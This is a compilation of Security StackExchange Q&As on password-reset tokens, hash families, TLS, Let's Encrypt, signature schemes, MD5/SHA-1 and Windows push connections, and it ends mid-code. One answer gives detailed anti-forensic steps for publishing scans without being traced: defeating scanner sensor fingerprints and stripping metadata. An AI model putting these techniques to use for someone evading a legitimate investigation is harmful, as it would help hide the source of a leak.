Yes, you should hash password reset tokens, for exactly the reasons you mentioned. But no, it's not quite as bad as unhashed passwords, because: reset tokens expire, and not every user has an active one; and users notice when their passwords are changed, but not when their passwords are cracked, and can thus take steps to limit the damage (change their password and other sensitive data, etc.). Additionally, as users reuse passwords, an attacker can try a cracked password on other accounts, such as the user's email, thus increasing the damage.
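A minimal sketch of that storage scheme in Python (standard library only; function names are illustrative). Because reset tokens are long and random, a fast hash like SHA-256 is enough here, unlike user-chosen passwords, which need a slow, salted hash.

```python
# Sketch: store only a hash of the reset token; the plaintext token goes into
# the email link and is never persisted.
import hashlib
import hmac
import secrets

def issue_reset_token():
    token = secrets.token_urlsafe(32)                     # sent to the user
    stored = hashlib.sha256(token.encode()).hexdigest()   # saved in the database
    return token, stored

def verify_reset_token(presented: str, stored: str) -> bool:
    digest = hashlib.sha256(presented.encode()).hexdigest()
    return hmac.compare_digest(digest, stored)            # constant-time compare

token, stored = issue_reset_token()
print(verify_reset_token(token, stored))    # True
print(verify_reset_token("guess", stored))  # False
```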
{ "source": [ "https://security.stackexchange.com/questions/86913", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7247/" ] }
86,917
I was thinking of the following question for a long time and did not find a lot of material* in the web and nothing at all on Security.SE . I think its a very interesting question as it covers different anonymization measures (or counter measures to possible deanonymization measures of soft- & hardware) and within the modern times seems to be more important than ever to protect the human right of freedom of speech . How can I publish (scanned) documents anonymously? To narrow down the question a little bit, lets define some parameters: I have some documents in paper form I want to publish without identifying me as the publisher. These documents have no "fingerprint" or any unique printed information on them to identify me as the owner. (Or I have covered it) I will publish the digital files via a secure network (e.g. Tor) with an open source file hosting website that is guaranteed to not store or even publish any information about the uploader. Things I thought of that might be a problem: Do scanners add any visual unique fingerprint (or even worse: information about the connected device etc.) to every scanned page? Do scanners add any digital (e.g. binary) fingerprint (or even worse: information about the connected device etc.) to every scanned file? Do scanners have a unique 'technical unavoidable' fingerprint, so every scanner scans differently? And is this fingerprint computable or even stored somewhere? Or does the 'institution' that wants to deanonymize me have to have access to my scanner to make an comparison? Do PDFs 'store' any information related to the host computer in them? And if the answer to one of the question was yes, how can I remove or avoid this information? *Two notable Sources I have found: There is a small paragraph on WikiLeaks talking about unique fingerprints of CDs but not of Scanner output or PDFs... A paper from Purdue University about scanner & printer forensics
Publishing scans without being identified is a tough proposition. There are multiple risks of information leak, and mitigation is technically complex. However, anyone determined to do so can learn the appropriate techniques, and there is free software to accomplish the task. Disclaimer: Although I consider myself technically knowledgeable about the mentioned issues and I've included references where they exist, some parts of this answer are speculative. Risks: Do scanners add any visual unique fingerprint (or even worse: information about the connected device etc.) to every scanned page? This seems likely , considering that some printers do so . There isn't much information available on scanners, though. Do scanners add any digital (e.g. binary) fingerprint (or even worse: information about the connected device etc.) to every scanned file? If you're doing a scan from an attached PC (as your question implies), the answer is no, the scanner can't . Scanners attached to a PC transfer raster image data, not files, so it can't possibly add data to a file it doesn't have access to. However, you should consider that a digital fingerprint could be added on the scanning software of the PC. Also, if the scanner is standalone (it saves files to a USB drive, or sends them by email), this is a definite possibility. Do scanners have a unique 'technical unavoidable' fingerprint, so every scanner scans differently? And is this fingerprint computable or even stored somewhere? Or does the 'institution' that wants to deanonymize me have to have access to my scanner to make an comparison? Yes . Most modern scanners use CCD sensors, which are uniquely identifiable by their noise pattern, using specialized software. Other plausible visual fingerprinting targets: Lighting pattern . Usually the scanner sensor bar has LEDs on it to illuminate the page. The number and distribution of leds will differ amongst models. the paper fiber distribution of the scanned page image distortion , caused by unique stepper motors (try scanning a piece of graphing paper ) Using these kind of fingerprinting techniques, it seems likely that the scanner model and paper type can be identified from the scans, but identifying the specific scanner and paper page used would be hard (perhaps impossible) without access to them for comparison purposes. Do PDFs 'store' any information related to the host computer in them? Yes, there's even a NSA article about it . While dealing with scanned documents, you'll need to be aware of image file metadata , which can also be present on PNG and JPG files, for example. Another risk that you didn't mention is that the scanner itself may store a copy of your scan . Big printers do Of course, this isn't a exhaustive list of risks - merely what has come to my mind in the couple of minutes it has taken me to write this answer. I'm pretty sure researchers, intelligence agencies and police paid to do so can come up with better ideas! Mitigation The easiest, safest and obvious mitigations are don't use a scanner that can be tied to your identity , and destroy the scanner after the fact . Of course, this is not always attainable, so what else can you do to protect yourself? Don't use a stand-alone scanner - especially a networked one. If you really must, convert its output to a pure image without metadata. For (at least partially) mitigating fingerprints added by software, you'll want to use open source software , both for the OS and the scanning program.. 
Avoid using your personal PC for scanning , or at least, use a secure live OS For detecting deliberate visual fingerprinting, the best option would be to scan a blank page and look for obvious anomalies . These might be very small, so you may want to use a image editor to crank up the contrast. For sensor, paper and visual fingerprinting in general, you want to destroy subtle scanning artifacts . Use a image editor to: Add noise Use a noise reduction filter (with aggressive reduction) Rotate Distort the image (by applying multiple camera "lens correction", for example) Convert the image to grayscale increase the contrast (or, preferably, completely convert to black-and-white) Reduce resolution (preferably by a near-to-irrational factor) Compress the image (high JPEG compression, for example) In general, do everything you can to obfuscate and reduce the amount of information contained in the image while keeping the document reasonably readable. Finally, after all the other steps, remove the medatadata from your files . You can use specialized software to do this.
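For the image-mangling steps above, here is a minimal sketch assuming Python with the third-party Pillow library (file names are placeholders). Re-saving through a pipeline like this also drops most embedded metadata, but treat it as one layer of mitigation, not a guarantee against sensor fingerprinting.

```python
# Sketch: degrade subtle scanning artifacts (grayscale, slight rotation,
# filtering, odd-factor downscale, recompression) while keeping the document
# readable.
from PIL import Image, ImageFilter, ImageOps

img = Image.open("scan.png").convert("L")           # grayscale
img = img.rotate(0.7, expand=True)                  # small geometric distortion
img = img.filter(ImageFilter.MedianFilter(size=3))  # aggressive noise reduction
w, h = img.size
img = img.resize((int(w * 0.83), int(h * 0.83)))    # awkward, non-integer scale factor
img = ImageOps.autocontrast(img)                    # crank up the contrast
# Saving to a fresh JPEG discards the original file's EXIF/metadata block.
img.save("scan-cleaned.jpg", "JPEG", quality=40)
```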
{ "source": [ "https://security.stackexchange.com/questions/86917", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73273/" ] }
87,154
I'm confused about the difference between SHA-2 and SHA-256 and often hear them used interchangeably (which seems really wrong). I think SHA-2 is a "family" of hash algorithms and SHA-256 is a specific algorithm in that family. Is that correct? Can someone please clarify?
Just to cite Wikipedia (http://en.wikipedia.org/wiki/SHA-2): "The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256." So yes, SHA-2 is a family of hash functions and includes SHA-256.
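A quick way to see the family in practice, using Python's standard hashlib (the bit lengths printed are simply the digest sizes; SHA-256 is the 256-bit member):

```python
# Sketch: the SHA-2 family members differ in digest length; SHA-256 is one of them.
import hashlib

data = b"hello"
for name in ("sha224", "sha256", "sha384", "sha512"):
    digest = hashlib.new(name, data).hexdigest()
    print(f"{name}: {len(digest) * 4} bits -> {digest[:16]}...")
```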
{ "source": [ "https://security.stackexchange.com/questions/87154", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2075/" ] }
87,172
When the Tor exit node executes the client's request and receives a response from the server, it must create an onion cell that can be reversely decrypted along a circuit through the Tor network. Thus, the client must be the last one to decrypt, otherwise the contents of the request can be linked back to the client's IP by the first intermediate (bridge) node, breaking anonymity. Therefore it seems the exit node would need to first encrypt the response from the target server with the public key of the client -- therefore the client will be the only one that can decrypt and get the plaintext response. However, how can the exit node encrypt with the public key of the client? If it had this knowledge wouldn't it be able to determine the identity of the client?
{ "source": [ "https://security.stackexchange.com/questions/87172", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73511/" ] }
87,283
I just wanted to confirm: my system admin is telling me that TLS 1.0 is more secure than TLS 1.2 and told me I should stay on TLS 1.0. Is this accurate? He mentioned that TLS 1.2 is more vulnerable and that TLS 1.0 is more secure, and that the Heartbleed bug affects TLS 1.1 and TLS 1.2 and NOT TLS 1.0. Thank you!
Your admin got it real wrong (or there was some translation mishap). TLS 1.1 and 1.2 fix some issues in TLS 1.0 (namely, predictability of IV for CBC encryption of records). It is possible to work around this issue in TLS 1.0, but it depends on how hard the implementations work at it. So, in that sense, TLS 1.1 and 1.2 are more secure than TLS 1.0, since they are easier to implement securely. The so-called "heartbleed" is not a protocol flaw; it is an implementation bug that is present in some OpenSSL versions (OpenSSL is a widespread implementation of SSL/TLS, but certainly not the only one). When an OpenSSL version has that bug, it has it for all protocol versions, including TLS 1.0. Thus, when heartbleed applies, it equally applies to TLS 1.0, TLS 1.1 and TLS 1.2. When it does not apply, well, it does not apply. The source of the confusion is that your admin (or his sources) does not appear to understand or conceptualize the difference between protocols and implementations . TLS 1.0 and TLS 1.2 are protocols described in relevant standards ( RFC 2246 and RFC 5246 , respectively). A protocol says what bytes must be sent when. An implementation is a piece of software that runs the protocol. OpenSSL is an implementation. It so happens that the "heartbleed" bug occurs in the implementation of a relatively new protocol feature (the "heartbeat extension") that very old OpenSSL implementations don't know about. Thus, very old implementations of OpenSSL don't suffer from heartbleed (though they have other serious issues, being very old). The same very old implementations don't know about TLS 1.1 and TLS 1.2 at all. Thus, in the mind of your admin, the two independent facts coalesced into a single (but flawed) mantra, that wrongly says that heartbleed is a security issue of TLS 1.1 and 1.2.
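If you want to see the protocol/implementation distinction in practice, here is a minimal sketch with Python's standard ssl module (the host is a placeholder): the implementation is told which protocol versions it is willing to speak, and the version actually used is negotiated per connection.

```python
# Sketch: constrain the implementation (Python's ssl, typically backed by
# OpenSSL) to modern protocol versions and print what gets negotiated.
import socket
import ssl

host = "example.com"   # hypothetical server to test
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse TLS 1.0/1.1

with socket.create_connection((host, 443)) as tcp:
    with ctx.wrap_socket(tcp, server_hostname=host) as tls:
        print(tls.version())   # e.g. "TLSv1.2" or "TLSv1.3"
```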
{ "source": [ "https://security.stackexchange.com/questions/87283", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73638/" ] }
87,289
I received several automated emails at an early hour from several data brokers (e.g., Spokeo) asking me to confirm an opt-out for my email address and name. I did not request these, but I did so about 2 years ago from most data brokers, and I accidentally clicked on one of the links. The originating email address as well as the domain/IP of the email server look legitimate, and the links go to the appropriate domain. I am somewhat concerned because it happened within a short period across several brokers that are ostensibly separately owned, suggesting a human may have done this manually. On the other hand, it seems more strange than malicious. Is there any reason a malicious third party might be doing this?
{ "source": [ "https://security.stackexchange.com/questions/87289", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73644/" ] }
87,307
Background Trevor posed a question about the nature and validity of using a password manager, given the current prevailing model of authentication on most web resources. Caveat: this is not the naive question about whether password managers are insecure in general, Trevor knows that question has been asked and answered many times over (it's all about relative risk). Caveat: this is also not the routine question of the relative risk profile between password managers and memorization and manual entry alone. Trevor is familiar with that discussion as well. Questions Trevor asked a question which calls into dispute whether password managers are obsolete on the basis of functionality . If a user can reliably select "I forgot my password" on most web sites, and have a password-reset initiated and a link sent to their e-mail inbox, then isn't their e-mail inbox serving the same functionality of a password manager? What is the benefit of trying to remember a password, or storing a password in a manager if a user can reliably get a password reset link every time they wish to login to the site ? Note This question is not identical to If I include a Forgot Password service, then what's the point of using a password? . Although similar, this question is intended to uncover what relative advantage (or disadvantage) exists when the use-case is compared to a password manager. In the other question, the use-case is compared to rote memorization, and does not identify the fact that a password manager may very well be equivalent to simply forgetting passwords and using a one-time login.
Your argument is contingent upon using a web based service. If you use your password manager for SFTP, encrypted drives, desktop apps, etc. then you don't have a self service reset option. If we then want to continue the argument only for web apps, here are some issues: This requires you to use one email address, which may not be practical (work versus personal email should not be commingled) or may not be desired (anonymity concerns, organization, shared email for a club, etc.). If you use multiple email addresses this also reduces the impact of one of them being compromised. This requires the service provider to require an email address, not all services request or require you to provide an email address. I am not sure you want to count on reliability of a reset service. This may take significantly longer for the reset email to go through. The service provider may ( should ) rate limit such requests. Password resets are not designed for this purpose. A password reset may be part of a comprehensive analysis to put the account on a higher alert for monitoring. The account was just reset, this is unusual, so apply more monitoring and checks because the reset may indicate an account takeover. Password resets are not generally considered the norm . For a password reset there is often challenge questions, so these still have to be entered each time. This is needed because the email account cannot be known to be secure or isolated to the user. Depending on who you ask, this is sort of combining "something you know" (challenge questions) with "something you have" (the email account). I would personally rather the attacker had to break into my computer rather then find a flaw in the email providers system, internal networks, etc. I don't really feel like my email on the Internet is secure or private. Even if this was super fast, in every case and there were no challenge questions, its still tedious, requires switching tabs, etc. You may also get distracted by your other emails, things may accidentally go to SPAM. I use a keyboard shortcut for auto-type, very quick and transparent. My password manager also clears out my clipboard. At the end of the day, I think I have more control over my desktop password manager, it applies in many more scenarios, and its easier and more reliable.
{ "source": [ "https://security.stackexchange.com/questions/87307", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7377/" ] }
87,325
I'm learning asymmetric encryption in the context of the SSL/TLS protocol. I can understand that the public key (like a padlock) can encrypt (lock) something and only the private key can decrypt (open) it. But I just can't understand the other way around. How can the public key verify digital signatures created with the CA's private key? A lot of material says that a public key can't be used for decryption (that's fine; if you imagine the public key is a padlock, then for sure you're not able to unlock things with it). Then how can public keys be used to verify digital signatures, given that they can't be used to decrypt? I can understand that public/private keys are used for client-server verification: a server encrypts some secret and asks the client to decrypt it, compares the results, and then knows whether the client is the holder of the private key. But digital signatures are a different story, because I think the digital signature doesn't contain the private key of the issuer, right? Then how can the above verification be done without decrypting with the private key?
The whole concept of trying to explain signatures with the terminology of encryption is flawed. It simply does not work. So let's unravel the whole thing, and this will require some formalism. Formally , a cryptographic signature system consists in three algorithms: KeyGen : takes as input a "security parameter" (say, the length of the key we want to obtain), and produces a new public/private key pair ( K p , K s ). Sign : takes as input a message m and a private key K s ; output is a signature s . Verify : takes as input a message m , a signature s and a public key K p ; output is a boolean ( true on success, false if the signature is not valid). The system is said to be sound if the algorithms operate as advertised ( Sign produces signatures that Verify accepts, using key pairs produced by KeyGen ). The system is said to be cryptographically secure if it is computationally infeasible to make forgeries : given a public key K p , and without knowing K s _, it should not be feasible (within the limits of existing technology) to produce a ( m , s ) pair such that Verify ( m , s , K p ) = true . The definition implies, in particular, that the private key should not be computable from the public key alone, because otherwise forgeries would be easy. None of the above says anything about how the algorithms work. Various systems have been invented, described and standardized. RSA is a very well-known asymmetric algorithm, but that's wrong, because RSA is not one algorithm. RSA is the name for an internal operation called a trapdoor permutation , from which an asymmetric encryption system and a signature system have been derived. The RSA operation is, roughly, the following: Let n be a big integer such that n = pq , where p and q are two big, distinct primes. Knowledge of p and q is the "private key". Let e be some (usually small) integer, called the "public exponent"; e must be such that it is relatively prime to both p-1 and q-1 . Traditional values for e are 3 and 65537. Given an integer x modulo n (an integer in the 0 to n-1 range), the RSA forward operation is computing x e mod n ( x is raised to exponent e modulo n ). This is easy enough to do. It so happens that this operation is a permutation of integers modulo n (each y modulo n is equal to x e mod m for exactly one x ). The "magic" part is that, for some reason, nobody found an efficient way to compute the reverse operation (getting x from x e mod n ) without knowing p and q . And that's not for lack of trying; integer factorization has been studied by the finest minds for more than 2500 years. When you know p and q , the RSA reverse operation becomes easy. The knowledge of p and q is thus called the trapdoor . Now that we have this trapdoor permutation, we can design a signature algorithm which works the following way: KeyGen : given a target length k , produce two random primes p and q of length about k /2 bits, such that p-1 and q-1 are both relatively prime to an a priori chosen e (e.g. e = 3), and n = pq has length k bits. The public key is ( n , e ), the private key is ( p , q , e ). Sign : take message m , hash it with some hash function (e.g. SHA-256), and "turn" the hash output (a sequence of 256 bits in the case of SHA-256) into an integer y modulo n . That transform is what the padding is about, because the standard method (as described in PKCS#1 ) is writing the hash output with some extra bytes, and then interpreting the result as an integer (in big-endian convention in the case of PKCS#1). 
Once the hashed message has been converted through the padding into an integer y , the private key owner applies the trapdoor (the reverse RSA operation) to compute the x such that x e = y mod n (such a x exists and is unique because the RSA operation is a permutation). The signature s is the encoding into bytes of that integer x . Verify : given a signature s , decode it back into an integer x modulo n , then compute y = x e modulo n . If this value y is equal to what would be the padding of h ( m ) (hash of message m ), then the signature is accepted (returned value is true ). RSA encryption is another, distinct system, that also builds on the RSA trapdoor permutation. Encryption is done by raising an integer x to the exponent e modulo n ; decryption is done by reversing that operation thanks to the knowledge of the private key (the p and q factors). Since such a system processes only big integers, and we want to encrypt and decrypt bytes , then there must also be some sort of conversion at some point, so a padding procedure is involved. Crucially, the security requirements for the encryption padding are quite distinct from those for the signature padding. For instance, the encryption padding MUST include a substantial amount of randomness, while the signature padding MUST include a substantial amount of determinism. In practice, the two padding systems are quite different. When people looked at RSA signatures and RSA encryption, they found it fit to describe signatures as a kind of encryption. If you look at it, the RSA forward operation (raising to the exponent e ) is done for RSA encryption, and also for RSA signature verification. Similarly, the reverse operation is done for RSA decryption, and for RSA signature generation. Furthermore, as a stroke of genius if genius was about confusing other people, some noticed that the RSA reverse operation can also be mathematically expressed as "raising an integer to some power modulo n ", just like the forward operation (but with a different exponent). Thus they began to call that reverse operation "encryption". At that point, RSA encryption, RSA decryption, RSA signature generation and RSA signature verification are all called "encryption". For some weird psychological reason (I blame the deleterious effects of post-Disco pop music), many people still find it pedagogically sound to try to explain four different operations by first giving them the same name. We described RSA; let's have a look at another, completely different algorithm called DSA . DSA does not use a trapdoor permutation. In DSA, we do computations modulo a big prime (traditionally called p ) and modulo another, smaller prime (called q ) which is such that p-1 is a multiple of q . p and q are known to everybody. There is an operation-that-goes-one-way in DSA. Given an integer g modulo p (strictly speaking, in a specific subset of p called the subgroup of order q ) and an integer x modulo q , everybody can compute g x mod p ; however, recovering x from g x mod p is computationally infeasible. While this somehow looks like RSA, there are crucial differences: Here, the operation is raising g to exponent x , where the actual input is x (the exponent), because g is a fixed, conventional value. This is not a permutation, because x is an integer modulo q and g x mod p is an integer modulo p , a quite different set. This is certainly not a trapdoor: there is no "secret knowledge" that allows recovering x , except if you already know that exact value x . 
However, a signature algorithm can be built on that operation. It looks like this: KeyGen : the p , q and g integers are already fixed, and potentially shared by everybody. To generate a new private key, produce a random integer x between 1 and q -1. The public key is y = g x mod p . Sign : Given a message m , hash it, then convert the hash value into an integer h modulo q . Generate a new, fresh, discard-after-use random integer k between 1 and q-1 . Compute r = g k mod p mod q (the exponentiation is done modulo p , then the result is furthermore reduced modulo q ). Compute s = ( h + xr ) / k mod q . The signature is ( r , s ). Verify : Hash message m to recompute h . Compute w = 1 / s mod q . Compute u 1 = hw mod q . Compute u 2 = rw mod q . Compute v = g u 1 y u 2 mod p mod q . If v = r , the signature is valid; otherwise, it is not. Now good luck with trying to describe that as some sort of "encryption". If you find that it is unclear what is being encrypted here, it is because nothing is encrypted here. This is not encryption. However, there is an hand-waving conceptual description of signatures that works with both RSA, DSA, and many other signature algorithms. You can view signatures as a specific kind of authentication. In authentication , one person (the prover ) demonstrates his identity to another (the verifier ). The prover does this by performing some action that only that person can do, but in such a way that the verifier can be convinced that he witnessed the genuine thing. For instance, a very basic authentication system is called "show-the-password": the prover and the verifier both know a shared secret (the "password"); the prover demonstrates his identity to the verifier by uttering the password. For signatures , we want something a bit more complex: The signature is asynchronous. The signer acts once; verification is done afterwards, possibly elsewhere, and without any further active help from the signer. The verifier should not need to know any secret. The signature should be convincing for everybody. By signing, the signer shall not reveal any secret. His private key should not be consumed (yes, I know there are signature schemes that work with consumption; let's not go there). The signature should be specific to a given message m . One rather generic structure for authentication schemes is based on challenges : the verifier sends to the prover a challenge, that the prover can answer to only thanks to his knowledge of his secret. If you look at RSA, then you can see that it is a challenge-based authentication mechanism. The challenge is the hashed-and-padded message. The signer demonstrates his mastery of the private key by applying the RSA reverse operation on that challenge, something that only he can do; but everybody can apply the RSA forward operation to see that the challenge was indeed well met. If you look at DSA, then you can again see a challenge-based authentication mechanism. The signer first commits to a secret value k by publishing r ; then the challenge is (again) the message h combined with the commitment r ; the signer can answer to that challenge only by using his private key x . In DSA, the signer has a permanent private key x , produces a one-shot private value k , and demonstrates his knowledge of x/k mod q . (This does not leak information on x because k is used only once.) Summary: signature algorithms are not encryption algorithms, and explanations of signatures based on encryption can only be, at best, utterly confusing. 
A much better explanation is by showing that a signature algorithm is, in fact, a specific kind of authentication mechanism, by which the signer demonstrates his knowledge of the private key in response to a synthetic challenge that involves the signed message. This authentication is convincing for bystanders as long as the said challenge is sufficiently well specified that it is provably not cooked in the advantage of the signer. In RSA, it is the result of a deterministic hashing and padding (and the padding takes care to avoid the values where the RSA reverse operation becomes easy). In DSA, the challenge is computed from a prior commitment of the signer. Indeed, any zero-knowledge authentication system can be turned into a signature mechanism by making it non-interactive: since a ZK system works by commitments, challenges and responses to these challenges, you can make the signer compute all his commitments, hash them all along with the message to sign, and use the hash value as the challenges. This does not mean that a ZK proof lurks within all signature algorithms; however, if you find that DSA kinda looks like that, well, there are good reasons for that.
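To underline the "signing is not encryption" point at the level of an API, here is a minimal sketch assuming Python with the third-party cryptography package: the signing call takes a padding scheme and a hash, and verification either returns silently or raises; there is no "decrypt the signature" step exposed anywhere.

```python
# Sketch: RSA signature generation and verification as an authentication
# check, not as encryption/decryption of the message.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"certificate contents go here"

signature = private_key.sign(message, padding.PKCS1v15(), hashes.SHA256())

public_key = private_key.public_key()
try:
    public_key.verify(signature, message, padding.PKCS1v15(), hashes.SHA256())
    print("signature valid")
except InvalidSignature:
    print("signature forged or message altered")
```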
{ "source": [ "https://security.stackexchange.com/questions/87325", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73596/" ] }
87,375
I was just reading about SSL/TLS stuff, and according to this site (which is rated as A by Qualys SSL Labs), MD5 is totally broken, and SHA-1 has been cryptographically weak since 2005. And yet, I've noticed that a lot of programmers and even Microsoft only give us SHA-1/MD5 to check the integrity of files... As far as I know, if I change one bit of a file, its MD5/SHA-1 will change, so why/how are they broken? In which situations can I still trust checksums made with SHA-1/MD5? What about SSL certificates that still use SHA-1, like google.com's? I am interested in applications of MD5 and SHA-1 for checksums and for certificate validation. I am not asking about password hashing, which has been treated in this question.
SHA-1 and MD5 are broken in the sense that they are vulnerable to collision attacks. That is, it has become (or, for SHA-1, will soon become) realistic to find two strings that have the same hash. As explained here , collision attacks do not directly affect passwords or file integrity because those fall under the preimage and second preimage case, respectively. However, MD5 and SHA-1 are still less computationally expensive. Passwords hashed with these algorithms are easier to crack than the stronger algorithms that currently exist. Although not specifically broken, using stronger algorithms is advisable. In the case of certificates, signatures state that a hash of a particular certificate is valid for a particular website. But, if you can craft a second certificate with that hash, you can impersonate other websites. In the case of MD5, this has already happened, and browsers will be phasing out SHA-1 soon as a preventative measure ( source ). File integrity checking is often intended to ensure that a file was downloaded correctly. But, if it is being used to verify that the file was not maliciously tampered with, you should consider an algorithm that is more resilient to collisions (see also: chosen-prefix attacks ).
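For the file-integrity use case, here is a minimal sketch using Python's standard library (the file name and the published digest are placeholders): hashing in chunks scales to large downloads, and switching from MD5/SHA-1 to SHA-256 costs essentially nothing while removing the collision concern for maliciously prepared files.

```python
# Sketch: verify a download against a published SHA-256 digest.
import hashlib

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# Placeholder value standing in for the digest published by the vendor.
expected = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
print(sha256_of("download.iso") == expected)
```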
{ "source": [ "https://security.stackexchange.com/questions/87375", "https://security.stackexchange.com", "https://security.stackexchange.com/users/64261/" ] }
87,395
I am interested in watching an upcoming webinar that will discuss Puppet on AWS. In order to participate one needs to install a software application . Naturally, I won't do that as I can find enough information about the subject with a few simple Google services. However, sometimes there are webinars that I am interested in participating in. What criteria might an average user use to decide if a software package seems safe enough to install . Though Firefox is open source, I'm satisfied enough to trust the Mozilla binaries and I couldn't review all the source alone even if I weren't willing to trust the binaries. So that is a lower limit of what I'll install. What would be reasonable criteria for establishing a reasonable upper limit? Of course, I'm not looking for 100% security as nobody can provide that. I'm looking for something reasonable for average users who are not software developers. The computer is useless without installing third-party applications, even if the OS provided them via a repo.
Trust is not a boolean variable, "trusted = true / false", you should better think about trust level . A few example of questions which may help you to evaluate the trust level you can grant to this software: How much do you trust the editor of this software? Could the software have been modified by a malicious 3rd-party between being created and being delivered to your computer? What is the sensitivity of the data you need provide to this software? What is the sensitivity of the data residing on the computer which will run this software? How long and how often will need to use this software? If I correctly understand your question: You do not trust the editor, otherwise you wouldn't have asked this question in the first place, This software will just need the information related to this webinar you will attend, Your computer hosts sensitive or at least personal information which makes you worry about trust issues, This will be a one spot usage for this webinar, at best for further reference only. In such conditions, I would just create some virtual machine so I would not worry anymore with any privacy issue while being free to comply with the webinar requests. Once the webinar ends, I will be free to either archive the VM image or drop it.
{ "source": [ "https://security.stackexchange.com/questions/87395", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4758/" ] }
87,443
Let's Encrypt is an initiative from the Electronic Frontier Foundation (EFF), Mozilla, Cisco, Akamai, IdenTrust, and researchers at the University of Michigan that aims to automatically provide every domain owner with a recognized certificate that can be used for TLS. In order to prove that you own a domain, you need to install a file with particular (randomly generated) contents at a particular (randomly generated) URL on that domain. The Let's Encrypt server will verify this by accessing the URL, before signing the certificate. Now, suppose I have some attack which will make the domain awesomebank.example resolve to my server. Suppose I can also MITM some peoples' connections to https://awesomebank.example/ . TLS is intended to prevent me from seeing or altering their communications to the server without being detected. What prevents me from using this attack on the Let's Encrypt server, and obtaining a certificate for awesomebank.example , and then using it to MITM customers of AwesomeBank without being detected (because I have a valid certificate)? Doesn't the existence of a fully automated CA make the Internet less secure?
Same security as other DV certs What prevents me from using this attack on the Let's Encrypt server, and obtaining a certificate for awesomebank.example, and then using it to MITM customers of AwesomeBank without being detected (because I have a valid certificate)? Nothing. If you own the network, then you own the network. And DV type certs (see below) rely on the network for proof of domain ownership. There are usually no out-of-band checks. (Nobody will call your phone, nobody will check your photo ID, nobody will visit you at the place the company is registered to, etc.) Doesn't the existence of a fully automated CA make the Internet less secure? Nope. Same level of security as DV type certs. There are (currently) three assurance levels for x509 certs: DV, Domain Validation OV, Organization Validation EV, Extended Validation DV is the cheapest. It basically means "If somebody can answer an email to [email protected], then that person gets a certificate for example.com" . There are additional checks for OV, EV. More info about cert types: GlobalSign.com: What are the different types of SSL Certificates? (Archived here .) Wikipedia: https://en.wikipedia.org/wiki/Public_key_certificate#Validation_levels And a lot more background info in these slides here: RSAConference2017, Session ID: PDAC-W10, Kirk Hall, 100% Encrypted Web -- New Challenges for TLS Further reading Ryan Hurst, 2016-01-06, Understanding risks and avoiding FUD (Archived here .) Nice blog post by GlobalSign CTO Ryan Hurst on his private blog. He largely makes the same points as me. But it's a lot more in depth. And it's a bit of a rant against TrendMicro's rhetoric against Let's-Encrypt. Note that TrendMicro and GlobalSign both sell SSL certificates and are direct competitors. (Also: They both are members of the CAB Forum and members of the CA Security Council .) Update 2018-03-06 : Scott Helme, 2018-03-06, Debunking the fallacy that paid certificates are better than free certificates, and other related nonsense (Archived here .)
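To give a feel for what the automated check behind a DV issuance looks like, here is a deliberately simplified Python sketch of a validator fetching a random token from the applicant's domain. It is not the real ACME exchange; the path and function names are made up for illustration:

import secrets
import urllib.request

def issue_challenge_token():
    # The CA generates a random token that the applicant must publish on the domain.
    return secrets.token_urlsafe(32)

def domain_controls_token(domain, token, path="/.well-known/challenge"):
    # Fetch the challenge URL and compare the body to the expected token.
    url = f"http://{domain}{path}/{token}"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode().strip() == token
    except OSError:
        return False

# The check only proves control of the name as seen from the CA's network vantage
# point -- which is exactly why owning the network path defeats it.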
{ "source": [ "https://security.stackexchange.com/questions/87443", "https://security.stackexchange.com", "https://security.stackexchange.com/users/40059/" ] }
87,505
McAfee is seeing Windows Explorer ( explorer.exe ) establishing connections to external IPs: Also verified with cmd: C:\Windows\system32>tasklist|find "explorer.exe" explorer.exe 4052 Console 1 305,072 K C:\Windows\system32>netstat -anob|find "4052" TCP 192.168.1.19:19049 111.221.124.106:443 ESTABLISHED 4052 C:\Windows\system32> Why is Windows Explorer connecting to external IPs? Is it OK to block Windows Explorer from all ports (e.g. with a firewall like McAfee / Kaspersky) or would that lead to system instability? • Tested on Win 8.1 basic.
This is normal and expected behavior for a Windows system. The IP you mentioned resolves to sinwns2012412.wns.windows.com. The Windows Push Notification Services (WNS) enables third-party developers to send toast, tile, badge, and raw updates from their own cloud service. This provides a mechanism to deliver new updates to your users in a power-efficient and dependable way. How it works: The following diagram (not reproduced here) shows the complete data flow involved in sending a push notification. It involves these steps: Your app sends a request for a push notification channel to the Notification Client Platform. The Notification Client Platform asks WNS to create a notification channel. This channel is returned to the calling device in the form of a Uniform Resource Identifier (URI). The notification channel URI is returned by Windows to your app. Your app sends the URI to your own cloud service. This callback mechanism is an interface between your own app and your own service. It is your responsibility to implement this callback with safe and secure web standards. When your cloud service has an update to send, it notifies WNS using the channel URI. This is done by issuing an HTTP POST request, including the notification payload, over Secure Sockets Layer (SSL). This step requires authentication. WNS receives the request and routes the notification to the appropriate device. Reference: https://msdn.microsoft.com/en-us/library/windows/apps/hh913756.aspx
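As a rough sketch of the HTTP POST step described above — the header names, payload format and the token-acquisition step are assumptions for illustration, not an exact rendering of the WNS API:

import urllib.request

def push_toast(channel_uri, access_token, toast_xml):
    # Hypothetical sketch: the cloud service POSTs the notification payload
    # to the channel URI over HTTPS, authenticating with a bearer token.
    req = urllib.request.Request(
        channel_uri,
        data=toast_xml.encode("utf-8"),
        method="POST",
        headers={
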